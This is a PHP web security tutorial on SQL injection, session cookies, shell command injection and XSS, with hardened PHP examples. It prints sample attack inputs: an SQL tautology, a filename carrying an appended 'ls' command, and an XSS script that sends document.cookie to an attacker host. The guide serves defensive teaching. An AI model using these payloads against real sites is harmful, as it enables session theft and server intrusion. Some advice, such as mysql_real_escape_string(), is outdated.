Know something about PHP Security


So you are a PHP developer and you can build good PHP applications. Most web servers work well with PHP, which is why many people choose it as their web development language. But many attackers are able to find flaws in your code and get their own input executed through it, in the browser or on the server.

In this article we look at some PHP code and practices that may help protect your site.

GET vs POST

In PHP you can take user data using the GET or the POST method. Keep in mind that GET data is visible in the address bar: all variable names and values are displayed in the URL. POST data is passed to the current script in the body of the HTTP request. A GET request can be bookmarked, which a POST request cannot. It is not a good idea to use the GET method for sending passwords or other sensitive information.

Code Injection

Code injection is a technique used to extract information and to break into or crack a system. Injection flaws occur when an application sends untrusted data to an interpreter. They are often found in SQL, LDAP, XPath or NoSQL queries; OS commands; XML parsers; SMTP headers; program arguments; and so on. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing.

An injection attack could target a query built like this:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

The attacker modifies the 'id' parameter in their browser to send: ' or '1'='1. This changes the meaning of the query so that it returns all the records from the accounts table to the attacker.

You can avoid injection by taking these steps:

1. Don't write careless code; understand what every piece of your PHP code does with user input.
2. Use a safe API that properly handles all input characters.
3. Validate input (for example, accept only a number, a character set or a password of the expected shape in each input field).
4. Use escaping functions such as htmlspecialchars(), strip_tags() and mysql_real_escape_string().

There are more actions you can take to protect against code injection.
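The following is an added example, not code from the original article: the accounts query shown above rewritten in PHP, first in the vulnerable string-concatenation form and then with steps 2 and 3 of the list applied (a prepared statement with a bound parameter, after validating that the ID is a positive integer). The table and column names, the in-memory SQLite database and the sample rows are assumptions constructed for the demonstration. Note that the mysql_* functions, including mysql_real_escape_string(), were removed in PHP 7; prepared statements through PDO or mysqli are the replacement.

```php
<?php
// Added example (not from the original article). Table name, column names
// and the sample data below are assumptions for illustration.

// Vulnerable pattern: the raw 'id' parameter is concatenated into SQL, so a
// value such as   ' or '1'='1   changes the meaning of the statement.
function findAccountUnsafe(PDO $db, string $id): array
{
    $sql = "SELECT * FROM accounts WHERE custID='" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: validate the input shape first, then send the value as a
// bound parameter. The database driver never treats it as SQL text.
function findAccountSafe(PDO $db, string $id): array
{
    // Input validation: customer IDs are assumed to be positive integers;
    // anything else is rejected before any query is built.
    $custId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($custId === false) {
        throw new InvalidArgumentException('custID must be a positive integer');
    }

    $stmt = $db->prepare('SELECT * FROM accounts WHERE custID = :id');
    $stmt->bindValue(':id', $custId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration against an in-memory SQLite database (constructed sample data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the server,
// not PHP, handles the parameters.
$db->exec('CREATE TABLE accounts (custID INTEGER PRIMARY KEY, owner TEXT)');
$db->exec("INSERT INTO accounts VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

$payload = "' or '1'='1";

// Unsafe: the injected condition is always true, so every row comes back.
echo count(findAccountUnsafe($db, $payload)), " rows returned by the unsafe query\n";

// Safe: the same payload never reaches the database; validation rejects it.
try {
    findAccountSafe($db, $payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// A legitimate lookup still works and returns only the matching row.
echo count(findAccountSafe($db, '2')), " row returned by the safe query\n";
```

The bound parameter is what actually stops the injection; the integer check in front of it is defence in depth and also gives the caller a clear error instead of an empty result.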

Session Issue

PHP identifies a session by a session ID. You have seen websites warn you to accept their cookie policy; the cookie is used to identify the user. Every time you delete the cookies from the browser the page takes a little longer to load, but if the cookies stay in the browser the page loads faster. If the session ID is stored in a cookie, an attacker can steal it through XSS and JavaScript. Note that most modern browsers support HTTP-only cookies. These cookies are only accessible via HTTP(S) requests and not from JavaScript, so XSS snippets cannot read them.

You can delete a cookie with the following snippet:

setcookie($name, "", 1);      // expiry time 1 (one second after the epoch): the browser drops the cookie
setcookie($name, false);      // same effect, sending an empty value
unset($_COOKIE[$name]);       // also remove it from the copy the current request holds
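The following is an added example, not code from the original article: how to make the PHP session cookie HTTP-only (plus Secure and SameSite) before the session starts, replace the session ID on login, and clear the session and its cookie on logout, which is the server-side counterpart of the deletion snippet above. The cookie name and the login/logout helper names are assumptions; the array forms of session_set_cookie_params() and setcookie() require PHP 7.3 or later.

```php
<?php
// Added example (not from the original article). The cookie name and the
// helper function names are assumptions for illustration.

// Configure the session cookie before session_start(). HttpOnly keeps the
// cookie out of document.cookie, so a script injected via XSS cannot read it;
// Secure restricts it to HTTPS; SameSite=Strict stops cross-site requests
// from carrying it.
session_set_cookie_params([
    'lifetime' => 0,          // session cookie: discarded when the browser closes
    'path'     => '/',
    'domain'   => '',         // current host only
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);

// Never accept a session ID from the URL, and reject IDs the server did not issue.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_strict_mode', '1');

session_name('APPSESSID');    // assumed cookie name
session_start();

// On a successful login, replace the session ID so that an ID the attacker may
// already know (session fixation) is not upgraded to an authenticated session.
function onLoginSuccess(int $userId): void
{
    session_regenerate_id(true);   // true = delete the old session data
    $_SESSION['user_id'] = $userId;
    $_SESSION['logged_in_at'] = time();
}

// On logout, clear the server-side state and expire the cookie with the same
// attributes it was set with, so the browser matches and removes it.
function logout(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', [
            'expires'  => time() - 42000,
            'path'     => $p['path'],
            'domain'   => $p['domain'],
            'secure'   => $p['secure'],
            'httponly' => $p['httponly'],
            'samesite' => $p['samesite'],
        ]);
    }
    session_destroy();
}

// Usage sketch for a login handler (user ID is a constructed value):
// onLoginSuccess(42);
// and for a logout handler:
// logout();
```

The same attributes can be set globally in php.ini (session.cookie_httponly, session.cookie_secure, session.cookie_samesite); setting them in code as above keeps the policy next to the session handling that depends on it.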

Shell Injection

Shell injection, or command injection, is the injection of operating system commands that get executed through a web application. Suppose a custom script is needed to display file contents to users. The following example makes the concept of shell injection clear:

A user comes to the page with the following URL:

www.xxxxxxx.com/viewcontent.php?filename=my_project.txt

The PHP page shows the user the content without trouble. As you may have guessed, the code is not secure and is vulnerable to a shell command injection attack. An attacker may append a semicolon (;) and another Unix command to the filename given in the URL parameter, perhaps starting by listing the files in the directory:

www.xxxxxxx.com/viewcontent.php?filename=my_project.txt;ls

The page still comes up with the file contents, but it does not end there: the injected command (ls) is executed as well, and its output reveals information about the server:

Example file listing produced by the injected ls:

my_project.txt
viewcontent.php
icon.png

To defeat shell injection, avoid passing user-supplied arguments to OS programs at all, or strip out potentially damaging characters such as semicolons and the other separators that can be used to run additional commands.
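The following is an added example, not code from the original article: a hardened version of the viewcontent.php page described above. It follows the first piece of advice (no shell at all) by validating the file name against a strict pattern, resolving it inside one fixed directory and reading it with PHP's own file functions; a second helper shows escapeshellarg() for the case where an external program really has to be run. The content directory, the accepted name pattern and the helper names are assumptions.

```php
<?php
// Added example (not from the original article). The content directory, the
// file name pattern and the function names are assumptions for illustration.

// The vulnerable pattern the article describes: the file name from the URL is
// pasted into a shell command, so "my_project.txt;ls" runs a second program.
//   echo shell_exec('cat ' . $_GET['filename']);

// Hardened: no shell at all. The name is validated against a strict allow
// pattern, resolved inside one fixed directory, and read with PHP's own I/O.
const CONTENT_DIR = __DIR__ . '/content';   // assumed location of viewable files

function readUserFile(string $filename): string
{
    // Accept only a plain base name: letters, digits, dot, dash, underscore.
    // This rejects ';', '|', '&', '$', spaces and slashes outright.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $filename)
        || $filename === '.' || $filename === '..') {
        throw new InvalidArgumentException('invalid file name');
    }

    $base = realpath(CONTENT_DIR);
    $path = realpath(CONTENT_DIR . '/' . $filename);

    // realpath() returns false for a missing file; the prefix check blocks a
    // symlink inside the directory that points somewhere outside it.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('file not found');
    }

    return file_get_contents($path);
}

// If an external program really must be run, escape the one variable argument
// and keep every other part of the command line fixed.
function listContentDir(): string
{
    $out = shell_exec('ls -1 ' . escapeshellarg(realpath(CONTENT_DIR)));
    return is_string($out) ? $out : '';
}

// Request handling for  viewcontent.php?filename=my_project.txt
header('Content-Type: text/plain; charset=utf-8');
try {
    echo readUserFile($_GET['filename'] ?? '');
} catch (InvalidArgumentException | RuntimeException $e) {
    http_response_code(400);
    echo 'error: ', $e->getMessage();
}
```

With this code the request filename=my_project.txt;ls fails the pattern check and gets a 400 response; nothing is ever handed to a shell. The text/plain content type also keeps a file's contents from being interpreted as HTML by the browser.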

Cross Site Scripting Attacks

Cross-site scripting, also known as an XSS attack, occurs when script content carried by the application, a URL parameter of a GET request or an uploaded file reaches the browser window after bypassing the validation process. Once an XSS script is triggered, its deceptive nature makes users believe that the compromised page of a specific website is legitimate.

Note that the user might see a popup window asking for confirmation when a page contains an XSS script.

Look at this code:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the 'CC' parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

This causes the user's session ID to be sent to the attacker's website, which means the attacker has the website admin's credentials and can take complete control over it.
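The following is an added example, not code from the original article: the credit-card input field from above rendered in PHP, first exactly as the vulnerable snippet builds it and then with output encoding for the HTML attribute context, which is what stops the payload from breaking out of the value attribute. The parameter name CC comes from the article; the helper names, and the placeholder host in the constructed payload, are assumptions.

```php
<?php
// Added example (not from the original article). Helper names and the
// placeholder host in the sample payload are assumptions for illustration.

// Vulnerable: the raw parameter closes the value attribute and the input tag,
// so the payload shown above becomes live markup.
function renderFieldUnsafe(string $cc): string
{
    return "<input name='creditcard' type='TEXT' value='" . $cc . "'>";
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES converts both
// ' and " to entities, so the attacker cannot close a single-quoted attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderFieldSafe(string $cc): string
{
    return "<input name='creditcard' type='TEXT' value='" . e($cc) . "'>";
}

// Constructed input in the shape of the payload above (host is a placeholder).
$payload = "'><script>document.location='http://attacker.example/c?foo='+document.cookie</script>'";

// The unsafe rendering emits a real <script> element.
echo renderFieldUnsafe($payload), "\n";

// The safe rendering emits &#039;&gt;&lt;script&gt;... inside the attribute,
// which the browser shows as inert text in the field.
echo renderFieldSafe($payload), "\n";

// Real request handling: encode at the point of output, for the context the
// value lands in. Stripping tags on input is not a substitute, because the
// same value may be echoed into other contexts later.
echo renderFieldSafe($_GET['CC'] ?? '');
```

Pair this with the HttpOnly session cookie described earlier: encoding stops the script from being injected, and HttpOnly means that even a script that does run cannot read document.cookie.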